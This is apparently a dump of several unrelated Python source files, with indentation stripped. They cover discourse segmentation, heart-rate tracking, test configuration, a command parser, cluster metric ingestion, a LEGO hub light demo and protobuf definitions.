tok["samepar_right"] = 0
next["samepar_left"] = 0
return tokens_by_abs_id
@staticmethod
def bin_numbers(number,bin_splits=None):
if bin_splits is None:
return 1 # Single bin
else:
for i in bin_splits:
if number >= i:
return i
return bin_splits[0] # If number not greater than any split, it belongs in minimum bin
@staticmethod
def n_gram(data, tokens_by_abs_id, dummies=True):
"""
Turns unigram list of feature dicts into list of five-skipgram+parent features by adding features of adjacent tokens
:param data: input tokens as a list of dictionaries, each filled with token property key-values
:param tokens_by_abs_id: dictionary of absolute sent+word IDs to the corresponding token property dictionary
:param dummies: Boolean, whether to wrap data with dummy -2, -1 ... +1 +2 tokens for training (should be False when predicting)
:return: n_grammified token list without feature names, and list of header names
"""
n_grammed = []
# Remove unneeded features
del_props = ["descendants","lemma","docname","head"]
for tok in data:
for prop in del_props:
tok.pop(prop)
base_headers = sorted(data[0].keys())
headers = copy.deepcopy(base_headers)
# Create fake root token to represent parent of root tokens
root_type = copy.deepcopy(data[0])
root_type.update({"word":"_","deprel":"_","first":"_","last":"_","genre":"_","closest_left":"_",
"closest_right":"_","farthest_left":"_","farthest_right":"_","pos":"_","cpos":"_","morph":"_"})
# Also use this token to introduce "_" as possible feature value for OOV cases
oov_type = copy.deepcopy(root_type)
oov_type["abs_id"] = "OOV"
oov_type["abs_parent"] = "OOV"
tokens_by_abs_id["OOV"] = oov_type
for pref in ["mn2","mn1","par","par_par","pl1","pl2"]:
headers += [pref + "_" + h for h in base_headers]
# During training, pseudo-wrap extra tokens to enable 5 skip grams
wrapped = []
wrapped.append(copy.deepcopy(data[-2]))
wrapped.append(copy.deepcopy(data[-1]))
if dummies:
wrapped.append(oov_type)
wrapped += data
if dummies:
wrapped.append(oov_type)
wrapped.append(copy.deepcopy(data[0]))
wrapped.append(copy.deepcopy(data[1]))
data = wrapped
for i in range(2,len(data)-2):
tok = data[i]
prev_prev = data[i-2]
prev = data[i-1]
next = data[i+1]
next_next = data[i+2]
if tok["abs_parent"] in tokens_by_abs_id:
par = tokens_by_abs_id[tok["abs_parent"]]
else:
par = root_type
if par["abs_parent"] in tokens_by_abs_id:
par_par = tokens_by_abs_id[par["abs_parent"]]
else:
par_par = root_type
prev_prev_props = [prev_prev[k] for k in sorted(prev_prev.keys())]
prev_props = [prev[k] for k in sorted(prev.keys())]
tok_props = [tok[k] for k in sorted(tok.keys())]
par_props = [par[k] for k in sorted(par.keys())]
par_par_props = [par_par[k] for k in sorted(par_par.keys())]
next_props = [next[k] for k in sorted(next.keys())]
next_next_props = [next_next[k] for k in sorted(next_next.keys())]
n_grammed.append(tok_props + prev_prev_props + prev_props + par_props + par_par_props + next_props + next_next_props)
return n_grammed, headers
@staticmethod
def multicol_fit_transform(dframe, columns):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns and saves the mapping
:param dframe: pandas dataframe
:param columns: list of column names with categorical values to be pseudo-ordinalized
:return: the transformed dataframe and the saved mappings as a dictionary of encoders and labels
"""
if isinstance(columns, list):
columns = np.array(columns)
else:
columns = columns
encoder_dict = {}
# columns are provided, iterate through and get `classes_` ndarray to hold LabelEncoder().classes_
# for each column; should match the shape of specified `columns`
all_classes_ = np.ndarray(shape=columns.shape, dtype=object)
all_encoders_ = np.ndarray(shape=columns.shape, dtype=object)
all_labels_ = np.ndarray(shape=columns.shape, dtype=object)
for idx, column in enumerate(columns):
# instantiate LabelEncoder
le = LabelEncoder()
# fit and transform labels in the column
dframe.loc[:, column] = le.fit_transform(dframe.loc[:, column].values)
encoder_dict[column] = le
# append the `classes_` to our ndarray container
all_classes_[idx] = (column, np.array(le.classes_.tolist(), dtype=object))
all_encoders_[idx] = le
all_labels_[idx] = le
multicol_dict = {"encoder_dict":encoder_dict, "all_classes_":all_classes_,"all_encoders_":all_encoders_,"columns": columns}
return dframe, multicol_dict
@staticmethod
def multicol_transform(dframe, columns, all_encoders_):
"""
Transforms a pandas dataframe's categorical columns into pseudo-ordinal numerical columns based on existing mapping
:param dframe: a pandas dataframe
:param columns: list of column names to be transformed
:param all_encoders_: same length list of sklearn encoders, each mapping categorical feature values to numbers
:return: transformed numerical dataframe
"""
for idx, column in enumerate(columns):
dframe.loc[:, column] = all_encoders_[idx].transform(dframe.loc[:, column].values)
return dframe
if __name__ == "__main__":
p = ArgumentParser()
p.add_argument("-c","--corpus",default="spa.rst.sctb",help="corpus to use or 'all'")
p.add_argument("-d","--data_dir",default=os.path.normpath("../../../data"),help="Path to shared task data folder")
p.add_argument("-s","--sample_size",type=int,default=5000,help="Sample size to use for feature selection")
p.add_argument("-t","--tune_mode",default=None,choices=[None,"paramwise","full","hyperopt","features","permutation"])
p.add_argument("-r","--rare_thresh",type=int,default=200,help="Threshold rank for replacing words with POS tags")
p.add_argument("-m","--multitrain",action="store_true",help="Perform multitraining and save predictions for ensemble training")
p.add_argument("-b","--best_params",action="store_true",help="Load best parameters from file")
p.add_argument("--mode",action="store",default="test",choices=["train","train-test","optimize-train-test","test"])
p.add_argument("--eval_test",action="store_true",help="Evaluate on test, not dev")
p.add_argument("--auto",action="store_true",help="Evaluate on automatic parse")
opts = p.parse_args()
data_dir = opts.data_dir
rare_thresh = opts.rare_thresh
tune_mode = opts.tune_mode
if opts.auto:
data_dir = data_dir + "_parsed"
sys.stderr.write("o Evaluating on automatically parsed data\n")
corpora = os.listdir(data_dir)
if opts.corpus == "all":
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c))]
else:
corpora = [c for c in corpora if os.path.isdir(os.path.join(data_dir, c)) and c == opts.corpus]
for corpus in corpora:
if "pdtb" in corpus:
continue
sys.stderr.write("o Corpus: " + corpus + "\n")
train = os.path.join(data_dir,corpus, corpus + "_train.conll")
dev = os.path.join(data_dir, corpus, corpus + "_dev.conll")
test = os.path.join(data_dir, corpus, corpus + "_test.conll")
if "." in corpus:
lang = corpus.split(".")[0]
else:
lang = "eng"
auto = "" if not opts.auto else "_auto"
seg = SubtreeSegmenter(lang=lang,model=corpus,auto=auto)
seg.corpus_dir = data_dir + os.sep + corpus
# Special genre patterns and feature settings
if "gum" in corpus:
seg.genre_pat = "GUM_(.+)_.*"
best_params = None
if "optimize" in opts.mode:
best_clf, vars, best_params = seg.optimize(train,size=opts.sample_size,tune_mode=tune_mode,rare_thresh=rare_thresh,as_text=False, cached_params=opts.best_params)
# Now train on whole training set with those variables
if "best_score" in best_params:
best_params.pop("best_score")
sys.stderr.write("\no Training best configuration\n")
seg.train(train,chosen_feats=vars,rare_thresh=rare_thresh,clf_params=best_params,as_text=False,chosen_clf=best_clf)
elif "train" in opts.mode:
feats = None
params = None
best_clf = None
if opts.best_params:
best_clf, params, feats = get_best_params(corpus, "SubtreeSegmenter" + auto)
if len(feats) == 0:
feats = None
seg.train(train,rare_thresh=rare_thresh,as_text=False,multitrain=opts.multitrain,chosen_feats=feats,clf_params=params,chosen_clf=best_clf)
if "test" in opts.mode:
if opts.multitrain:
# Get prediction performance on out-of-fold
preds = seg.predict_cached()
else:
# Get prediction performance on dev
if opts.eval_test:
conf_mat, prec, rec, f1 = seg.predict(test,eval_gold=True,as_text=False)
else:
conf_mat, prec, rec, f1 = seg.predict(dev,eval_gold=True,as_text=False)
if best_params is not None and "optimize" in opts.mode: # For optimization check if this is a new best score
prev_best_score = get_best_score(corpus,"SubtreeSegmenter" + auto)
if f1 > prev_best_score:
sys.stderr.write("o New best F1: " + str(f1) + "\n")
print(seg.clf.__dict__)
with io.open(script_dir + os.sep + "params" + os.sep + "SubtreeSegmenter"+auto+"_best_params.tab",'a',encoding="utf8") as bp:
for k, v in best_params.items():
bp.write("\t".join([corpus, best_clf.__class__.__name__, k, str(v)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "features", ",".join(vars)])+"\n")
bp.write("\t".join([corpus, best_clf.__class__.__name__, "best_score", str(f1)])+"\n\n")
|
py | 1a3301d31666fa1c538c086d72a8585c8348e754 | #!/usr/bin/env python
from mapHrEstimator import *
#
# Global function
#
class Tracker:
def __init__(self, start, alpha=.01, beta=0, deltaFreqState = np.float(0), time=-1000,
maxChange = .5, boundHi=205, boundLo=40, maxDeltaT=3000):
self.freqState = np.float(start)
self.deltaFreqState = deltaFreqState
self.time = time
self.boundHi = boundHi
self.boundLo = boundLo
self.peakHist = []
self.freq = []
self.deltaFreq = []
self.timeHist = []
self.drHist = []
self.alpha = alpha
self.beta = beta
self.maxChange = maxChange
self.maxDeltaT = maxDeltaT
def update(self, time, peak, dynamicRange=None, maxRes=20):
deltaT = (time - self.time)
if deltaT > self.maxDeltaT:
deltaT = self.maxDeltaT
#Convert into seconds
deltaT = deltaT/1000
#todo - why do we need this???
if deltaT <= 0.0:
print("Negative DeltaT")
return 0
self.time = time
self.timeHist.append(self.time)
self.drHist.append(dynamicRange)
if peak == -1:
self.setInvalidHR(invalidHRHold=invalidHRHold)
return 0
if peak is None:
print("No Peak Passed to tracker")
self.peakHist.append(0)
else:
self.peakHist.append(peak)
if peak is not None:
if peak < self.boundLo or peak > self.boundHi:
peak = self.freqState
self.deltaFreqState = 0
else:
self.deltaFreqState = 0
if self.deltaFreqState > .5:
self.deltaFreqState = .5
if self.deltaFreqState < -.5:
self.deltaFreqState = -.5
# Kludge: Setting deltaFreqState to zero thus eliminated the beta part of the filter
self.deltaFreqState = 0
self.freqState += deltaT*self.deltaFreqState
if peak is not None:
residual = peak - self.freqState
alpha = self.alpha
beta = self.beta
if np.abs(residual) > maxRes:
residual = np.sign(residual)*maxRes
#update the state
self.freqState += alpha*residual
self.deltaFreqState += (beta/deltaT)*residual
if self.freqState < self.boundLo:
self.freqState = self.boundLo
self.deltaFreqState = 0
elif self.freqState > self.boundHi:
self.freqState = self.boundHi
self.deltaFreqState = 0
self.freq.append(self.freqState)
self.deltaFreq.append(self.deltaFreqState)
return 0
def setInvalidHR(self, invalidHRHold=False):
self.deltaFreqState = 0
self.peakHist.append(0)
if invalidHRHold:
self.freq.append(self.freqState) # hold prevHR during HR is invalid
else:
self.freq.append(-1) # do not hold prevHR, output -1
self.deltaFreq.append(self.deltaFreqState)
return 0
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('fname', help='data log file', default=None)
parser.add_argument('--truthFile', help='heart strap data', default=None)
parser.add_argument('--alphaFile', help='heart strap data from mio alpha', default=None)
parser.add_argument('--noPlots',help='show the plots or not',default=False,action='store_true')
parser.add_argument('--out', help='output filename', default='foo.csv')
args = parser.parse_args()
optTracks = []
accTracks = []
#header_def = [ ('time',float),('opt0',float),('opt1',float),('opt2',float),('acc0',float),('acc1',float),('acc2',float) ]
d = np.genfromtxt(args.fname,delimiter=',')
peaks = d[:,1:4]
accPeaks = d[:,4:7]
time = d[:,0]
startVals = [70]
for ind in np.arange(0,len(startVals)):
optTracks.append(Tracker(startVals[ind],maxChange=5))
startVals = [100]
for ind in np.arange(0,len(startVals)):
accTracks.append(Tracker(startVals[ind],alpha=.1,beta=.25))
for ind in np.arange(0,peaks.shape[0]):
for peakInd in np.arange(0,peaks.shape[1]):
for accInd in np.arange(0,accPeaks.shape[1]):
if (np.abs(peaks[ind,0] - peaks[ind,1]) < 20):
if np.abs(peaks[ind,peakInd]-accPeaks[ind,accInd]) < 5.0:
peaks[ind,peakInd] = np.min(peaks[ind,:])
#update the accelerometer tracks
#for each track find the closest peak
for track in np.arange(0,len(accTracks)):
accTracks[track].update(time[ind],accPeaks[ind,track])
'''
#for each track find the closest peak
for track in accTracks:
res = np.zeros((accPeaks.shape[1],))
for peakInd in np.arange(0,accPeaks.shape[1]):
res[peakInd] = np.abs(accPeaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],accPeaks[ind,closest])
'''
#for each track find the closest peak
for track in optTracks:
res = np.zeros((peaks.shape[1],))
weight=np.array([1.0,1.0,1.0])
for peakInd in np.arange(0,peaks.shape[1]):
if peaks[ind,peakInd] > 90:
res[peakInd] = weight[peakInd]*np.abs(peaks[ind,peakInd] - track.freqState)
closest = np.argmin(res)
track.update(time[ind],peaks[ind,closest])
pl.figure()
for ind in np.arange(0,peaks.shape[1]):
pl.plot(time[:],peaks[:,ind],'+')
pl.grid(True)
#pl.figure()
#todo - interpolate truth heart rate onto measured heart rate
if args.truthFile is not None:
hrTruth = np.genfromtxt(args.truthFile,skiprows=3,delimiter=',');
tTrue=hrTruth[:,0]-hrTruth[1,0]
tTrue /= 1000
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
for ind in np.arange(0,accPeaks.shape[1]):
pl.plot(time[:],accPeaks[:,ind],'+')
for track in accTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
if args.truthFile is not None:
pl.plot(tTrue,hrTruth[:,1],'g')
for track in optTracks:
pl.plot(track.timeHist,track.freq,'--')
pl.grid(True)
pl.figure()
pl.plot(optTracks[0].residual)
pl.show()
|
py | 1a3302e989a4d8f333e441e3286f5540276cb707 | import unittest
import sys
import StringIO
import HTMLTestRunner
import time
import traceback
class TestConfig(object):
""" Functions which are useful in both interactive & non-interactive mode """
def __init__(self):
self.suite = unittest.TestSuite()
def test_main(self, testList, browser):
for testModule in testList: # dotted notation module.class
self.overrideClassSortList(testModule["class"], testModule["tests"])
# self.suite.addTests(unittest.defaultTestLoader.loadTestsFromName(testName))
# Invoke TestRunner
buf = StringIO.StringIO()
runner = HTMLTestRunner.HTMLTestRunner(
stream=buf,
title="<Sahana Eden Test>",
description="Suite of regressions tests for Sahana Eden."
)
runner.run(self.suite)
# check out the output
byte_output = buf.getvalue()
# output the main test output for debugging & demo
# print byte_output
# HTMLTestRunner pumps UTF-8 output
output = byte_output.decode("utf-8")
self.fileName = "../results/regressionTest-%s-%s.html" % (browser.replace("*", ""), time.strftime("%Y%m%d-%H%M%S"))
file = open(self.fileName, "w")
file.write(output)
def overrideClassSortList(self, className, testList):
testLoader = unittest.defaultTestLoader
tempTests = unittest.TestSuite
try:
# loadTestsFromName will also import the module
tempTests = testLoader.loadTestsFromName(className)
except:
print "Unable to run test %s, check the test exists." % className
traceback.print_exc()
parts = className.split(".")
if len(parts) == 2:
# Grab the loaded module and get a instance of the class
module = sys.modules[parts[0]]
obj = getattr(module, parts[1])
obj.setSortList(testList)
# Add the sorted tests to the suite of test cases to be run
suite = unittest.TestSuite(map(obj, obj._sortList))
self.suite.addTests(suite)
# a file with test details listed per line, with the format being:
# <display name>, <dotted notation of the test>
# any line not meeting this criteria will be ignored.
# <dotted notation of the test> is:
# module optionally followed by the class name optionally followed by the method
# OR: module[.class[.method]]
def getTestModuleDetails(self):
# Read in the testModules files this is a comma separated list
# Each row consists of two values, the name to be displayed in the UI
# and the name of the class that will be invoked.
source = open("../data/testModules.txt", "r")
modules = source.readlines()
source.close()
# moduleList is a data structure containing all the details required by the UI for a module
# The outer structure is a list of modules
# The value is a map that will have three values
# name:display name, class the ClassName and tests:map of testcases
# The map of tests consists of the testName and a bool to indicate if it should be run
# [0]{
# name:CreateLocations:
# class:locations.Locations,
# tests:{'name':"loadLocationTestData",'state':True,
# 'name':"test_locationEmpty",'state':False,
# 'name':"test_addL0Location",'state':False,
# 'name':"removeLocationTestData",'state':True
# }
# }
moduleList = []
for module in modules:
details = module.split(",")
if len(details) == 2:
moduleDetails = {}
moduleDetails["name"] = details[0].strip()
moduleDetails["class"] = details[1].strip()
moduleDetails["tests"] = self.readTestCasesForClass(moduleDetails["class"])
moduleList.append(moduleDetails)
return moduleList
def readTestCasesForClass(self, className):
try:
source = open("../tests/%s.txt" % className, "r")
testcases = source.readlines()
source.close()
except:
# Need to generate the list from the class
print "File ../tests/%s.txt not found" % className
return self.extractTestCasesFromClassSource(className)
testList = []
for test in testcases:
details = test.split(",")
if len(details) == 2:
testDetails = {}
testDetails["name"] = details[0].strip()
if details[1].strip() == "True":
testDetails["state"] = True
else:
testDetails["state"] = False
testList.append(testDetails)
return testList
def extractTestCasesFromClassSource(self, className):
parts = className.split(".")
if len(parts) == 2:
# Grab the loaded module and get a instance of the class
try:
module = __import__( parts[0] )
except ImportError:
print "Failed to import module %s" % parts[0]
raise
module = sys.modules[parts[0]]
obj = getattr(module, parts[1])
testList = []
for test in obj._sortList:
tests = {}
tests["state"] = True
tests["name"] = test
testList.append(tests)
return testList
return []
def getTestCasesToRun(self, moduleList):
""" Take a moduleList & convert to the correct format """
i = 0
testModuleList = []
for module in moduleList:
testModule = {}
testDetail = []
for test in moduleList[i]["tests"]:
if test["state"] == True:
testDetail.append(test["name"])
testModule["class"] = moduleList[i]["class"]
testModule["tests"] = testDetail
testModuleList.append(testModule)
i += 1
return tuple(testModuleList)
|
py | 1a330357d9c079d268e1f3a124acf0db6a7e2bc2 | from rest_framework import serializers as ser
from website import settings
from urlparse import urljoin
from api.base.serializers import (
JSONAPISerializer,
LinksField,
)
class Scope(object):
def __init__(self, id, scope):
scope = scope or {}
self.id = id
self.description = scope.description
self.is_public = scope.is_public
def absolute_url(self):
return urljoin(settings.API_DOMAIN, '/v2/scopes/{}/'.format(self.id))
class ScopeSerializer(JSONAPISerializer):
filterable_fields = frozenset(['id'])
id = ser.CharField(read_only=True)
description = ser.CharField(read_only=True)
links = LinksField({'self': 'get_absolute_url'})
class Meta:
type_ = 'scopes'
def get_absolute_url(self, obj):
return obj.absolute_url()
|
py | 1a330375a387883eb347f805cfd8225531847d1f | from __future__ import annotations
import inspect
from typing import TYPE_CHECKING, Any, Dict, List, Optional, Tuple, Union
from .command import Command
from .converters import _CONVERTERS
if TYPE_CHECKING:
from .context import Context
__all__ = ("StringParser",)
class StringParser:
"""
A class representing a StringParser.
Attributes:
command_name (Optional[str]): The name of the command.
command (Optional[Command]): The [Command](./command.md) object.
arguments (List[str]): The arguments of the command.
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
def __init__(self, content: str, prefix: Union[str, Tuple[str, ...], List[str]]) -> None:
"""
Initialize a StringParser.
Parameters:
content (str): The content of the command.
prefix (Union[Tuple[str], str]): The prefix of the command.
"""
self.command_name: Optional[str] = None
self.command: Optional[Command] = None
self.arguments: List[str] = []
self.content = content
self.prefix = prefix
self.context: Context
def find_command(self) -> Optional[str]:
"""
Find the command.
Returns:
The command name.
"""
tokens = self.content.split(" ")
if prefix := self.parse_prefix():
if tokens[0].startswith(prefix):
self.command_name = tokens[0][len(prefix) :]
self.arguments = tokens[1:]
return self.command_name
return None
def parse_prefix(self) -> Optional[str]:
"""
Parse the prefix.
Returns:
The prefix.
"""
if isinstance(self.prefix, (tuple, list)):
find_prefix = [self.content.startswith(prefix) for prefix in self.prefix]
for index, prefix in enumerate(find_prefix):
if prefix is not True:
continue
return self.prefix[index]
elif not isinstance(self.prefix, (tuple, list)):
return self.prefix
return None
async def parse_arguments(self) -> Tuple[Dict, List]:
"""
Parse the arguments.
Returns:
The arguments and the keyword-arguments.
"""
keyword_arguments: Dict = {}
arguments: List = []
if self.command is not None:
signature = inspect.signature(self.command.callback)
for index, (argument, parameter) in enumerate(signature.parameters.items()):
if index == 0:
continue
if index == 1 and self.command.parent is not None:
continue
if parameter.kind is parameter.POSITIONAL_OR_KEYWORD:
arguments.append(await self.convert(parameter, self.arguments[index - 1]))
elif parameter.kind is parameter.KEYWORD_ONLY:
keyword_arguments[argument] = await self.convert(parameter, " ".join(self.arguments[index - 1 :]))
return keyword_arguments, arguments
async def convert(self, parameter: inspect.Parameter, data: str) -> Any:
name = parameter.annotation.removeprefix("lefi.")
if converter := _CONVERTERS.get(name):
return await converter.convert(self.context, data)
if parameter.annotation is not parameter.empty and callable(parameter.annotation):
return parameter.annotation(data)
return str(data)
@property
def invoker(self) -> Optional[Command]:
"""
Get the invoker.
Returns:
The invoker [Command](./command.md).
"""
return self.command
@property
def invoked_with(self) -> Optional[str]:
"""
The prefix the command was invoked with.
Returns:
The prefix.
"""
return self.parse_prefix()
|
py | 1a330397a0cfe4cfbaa69fdecaf8077c35af44e7 | import sys
sys.path.insert(0, "/home/nutanix/ncc/bin")
import env
import util.ncc.plugins.consts as consts
import util.ncc.config_module.config as config
from util.ncc.data_access.data_interface import *
from util.ncc.config_module.config import *
from util.ncc.ncc_utils.globals import HealthServerGlobals
from serviceability.plugin_schema_pb2 import *
from google.protobuf import text_format
import datetime
import time
import math
import copy
import os
import json
hglobals = HealthServerGlobals()
idf = hglobals.get_insights_da()
options = {"create_entity" : True}
print "begin writing capacity data"
current_time = int(round(time.time()))
april_25 = "04/25/2019"
time_delta = int(round(time.time()) - time.mktime(datetime.datetime.strptime(april_25, "%m/%d/%Y").timetuple()))
all_files = {}
for entity_type, _ , entity_files in os.walk(".", topdown=False):
if entity_type == "." or "xfit" in entity_type or "vm" in entity_type:
continue
entity_type = entity_type[2:]
all_files[entity_type] = entity_files
#print "all files", all_files
entity_types = ["cluster", "node", "container", "storage_pool"]
for entity_type in entity_types:
path = "entity_type"
completed_entity_ids = set()
for file in all_files[entity_type]:
ed_start_time = 1000000000000
ed_end_time = -1
ed_fields = []
entity_id = ""
#print "-------", file, "--" ,file.split("_attr.json")
if len(file.split("_attr.json")) == 2:
# print "----111---", file, "--" ,file.split("_attr.json")
entity_id = file.split("_attr.json")[0]
else:
# print "---222----", file, "--" ,file.split("_metrics.json")
entity_id = file.split("_metrics.json")[0]
if entity_id in completed_entity_ids:
continue
completed_entity_ids.add(entity_id)
#print "entity id", entity_id
if entity_type != "vm_small":
attribute_file = open(entity_type + "/" + entity_id + "_attr.json", "rb")
metric_file = open(entity_type + "/" + entity_id + "_metrics.json", "rb")
if entity_type != "vm_small":
#print "Creating", entity_type ," with entity id = ", entity_id
idf.register_entity(entity_type=entity_type, attribute_dict=json.loads(attribute_file.read()), entity_id=entity_id)
#print "Created", entity_type ,"with entity id = ", entity_id
#print "Adding metrics for ", entity_type," with entity id = ", entity_id
# print type(metric_file.read())
entity_data = EntityData()
entity_data.from_jsons(metric_file.read())
fd_list = entity_data.get_field_data_list(entity_id)
for fd in fd_list:
if entity_type =="vm" and ("lower" in fd.field_name or "upper" in fd.field_name):
continue
ed = EntityData()
fd.start_time_usec = fd.start_time_usec + (time_delta * 1000000)
fd.end_time_usec = fd.end_time_usec + (time_delta * 1000000)
ed_start_time = min(ed_start_time, fd.start_time_usec)
ed_end_time = max(ed_end_time, fd.end_time_usec)
ed_fields.append(fd.field_name)
entity_type_temp = entity_type
ed.append_field_data(entity_id, fd)
if entity_type == "vm_small":
entity_type_temp = "vm"
#print fd.values
last_good_value = -1
for i in range(len(fd.values)):
if i == 0:
continue
if fd.values[i] == -1:
fd.values[i] = last_good_value
if fd.values[i] != -1:
last_good_value = fd.values[i]
zeroes = 0
non_zeroes = 0
for x in fd.values:
if x==0:
zeroes = zeroes+1
else:
non_zeroes = non_zeroes+1
#print "num of zeroes =",zeroes," and num of non zeroes = ",non_zeroes," for ", fd.field_name, " of ",entity_id
time.sleep(0.5)
#print "Prepared entity data object for ", entity_type," with entity id = ", entity_id
idf.write(ed, entity_type_temp, entity_id, [fd.field_name], fd.start_time_usec/1000000, fd.end_time_usec/1000000, fd.sampling_interval_sec)
#print "Added metrics for ", entity_type," with entity id = ", entity_id," field_name= ",fd.field_name," and sampling interval = ",fd.sampling_interval_sec
#print "Prepared entity data object for ", entity_type," with entity id = ", entity_id
#idf.write(entity_data, entity_type, entity_id, ed_fields, ed_start_time, ed_end_time, sampling_interval)
#print "Added metrics for ", entity_type," with entity id = ", entity_id
|
py | 1a3303f3cbc6fea63965473a59bf4e0579674a02 | from .build import DATASET_REGISTRY, build_dataset # isort:skip
from .da import *
from .dg import *
from .ssl import *
|
py | 1a3303f7dce468f723159199d8e2e50752790f12 | from pybricks.hubs import CityHub
from pybricks.parameters import Color
from pybricks.tools import wait
from math import sin, pi
# Initialize the hub.
hub = CityHub()
# Make an animation with multiple colors.
hub.light.animate([Color.RED, Color.GREEN, Color.NONE], interval=500)
wait(10000)
# Make the color RED grow faint and bright using a sine pattern.
hub.light.animate(
[Color.RED * (0.5 * sin(i / 15 * pi) + 0.5) for i in range(30)], 40)
wait(10000)
# Cycle through a rainbow of colors.
hub.light.animate([Color(h=i*8) for i in range(45)], interval=40)
wait(10000)
|
py | 1a330534cd25d0e3eac3207ca8ff6e83bd39bb35 | # -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: object_detection/protos/post_processing.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='object_detection/protos/post_processing.proto',
package='object_detection.protos',
syntax='proto2',
serialized_options=None,
serialized_pb=_b('\n-object_detection/protos/post_processing.proto\x12\x17object_detection.protos\"\xbc\x01\n\x16\x42\x61tchNonMaxSuppression\x12\x1a\n\x0fscore_threshold\x18\x01 \x01(\x02:\x01\x30\x12\x1a\n\riou_threshold\x18\x02 \x01(\x02:\x03\x30.6\x12%\n\x18max_detections_per_class\x18\x03 \x01(\x05:\x03\x31\x30\x30\x12!\n\x14max_total_detections\x18\x05 \x01(\x05:\x03\x31\x30\x30\x12 \n\x11use_static_shapes\x18\x06 \x01(\x08:\x05\x66\x61lse\"\x91\x02\n\x0ePostProcessing\x12R\n\x19\x62\x61tch_non_max_suppression\x18\x01 \x01(\x0b\x32/.object_detection.protos.BatchNonMaxSuppression\x12Y\n\x0fscore_converter\x18\x02 \x01(\x0e\x32\x36.object_detection.protos.PostProcessing.ScoreConverter:\x08IDENTITY\x12\x16\n\x0blogit_scale\x18\x03 \x01(\x02:\x01\x31\"8\n\x0eScoreConverter\x12\x0c\n\x08IDENTITY\x10\x00\x12\x0b\n\x07SIGMOID\x10\x01\x12\x0b\n\x07SOFTMAX\x10\x02')
)
_POSTPROCESSING_SCORECONVERTER = _descriptor.EnumDescriptor(
name='ScoreConverter',
full_name='object_detection.protos.PostProcessing.ScoreConverter',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='IDENTITY', index=0, number=0,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SIGMOID', index=1, number=1,
serialized_options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SOFTMAX', index=2, number=2,
serialized_options=None,
type=None),
],
containing_type=None,
serialized_options=None,
serialized_start=483,
serialized_end=539,
)
_sym_db.RegisterEnumDescriptor(_POSTPROCESSING_SCORECONVERTER)
_BATCHNONMAXSUPPRESSION = _descriptor.Descriptor(
name='BatchNonMaxSuppression',
full_name='object_detection.protos.BatchNonMaxSuppression',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='score_threshold', full_name='object_detection.protos.BatchNonMaxSuppression.score_threshold', index=0,
number=1, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='iou_threshold', full_name='object_detection.protos.BatchNonMaxSuppression.iou_threshold', index=1,
number=2, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(0.6),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_detections_per_class', full_name='object_detection.protos.BatchNonMaxSuppression.max_detections_per_class', index=2,
number=3, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=100,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='max_total_detections', full_name='object_detection.protos.BatchNonMaxSuppression.max_total_detections', index=3,
number=5, type=5, cpp_type=1, label=1,
has_default_value=True, default_value=100,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='use_static_shapes', full_name='object_detection.protos.BatchNonMaxSuppression.use_static_shapes', index=4,
number=6, type=8, cpp_type=7, label=1,
has_default_value=True, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=75,
serialized_end=263,
)
_POSTPROCESSING = _descriptor.Descriptor(
name='PostProcessing',
full_name='object_detection.protos.PostProcessing',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='batch_non_max_suppression', full_name='object_detection.protos.PostProcessing.batch_non_max_suppression', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='score_converter', full_name='object_detection.protos.PostProcessing.score_converter', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
_descriptor.FieldDescriptor(
name='logit_scale', full_name='object_detection.protos.PostProcessing.logit_scale', index=2,
number=3, type=2, cpp_type=6, label=1,
has_default_value=True, default_value=float(1),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
_POSTPROCESSING_SCORECONVERTER,
],
